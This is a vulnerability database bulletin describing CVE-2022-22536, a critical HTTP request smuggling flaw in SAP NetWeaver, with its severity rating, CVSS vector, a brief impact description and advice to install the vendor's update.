SB2022021025 - HTTP request smuggling in SAP NetWeaver

CSH
CYBERSECURITY HELP
Sign In REGISTER

Main Vulnerability Database SB2022021025

SB2022021025 - HTTP request smuggling in SAP NetWeaver

Published: February 10, 2022 Updated: April 4, 2025

Security Bulletin ID SB2022021025
CSH Severity
Critical
Patch available
YES
Number of vulnerabilities 1
Exploitation vector Remote access
Highest impact Code execution

Breakdown by Severity

Critical 100%
  • Low
  • Medium
  • High
  • Critical

Description

This security bulletin contains information about 1 vulnerability.


1) Inconsistent interpretation of HTTP requests (CVE-ID: CVE-2022-22536)

CWE-ID: CWE-444 - Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling')

CVSSv4: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:A/U:Red


The vulnerability allows a remote attacker to perform HTTP request smuggling attacks.

The vulnerability exists due to improper validation of HTTP requests. A remote attacker can prepend a victim's request with arbitrary data and execute functions impersonating the victim or poison intermediary Web caches.

Successful exploitation of the vulnerability can result in full system compromise.


Remediation

Install update from vendor's website.

References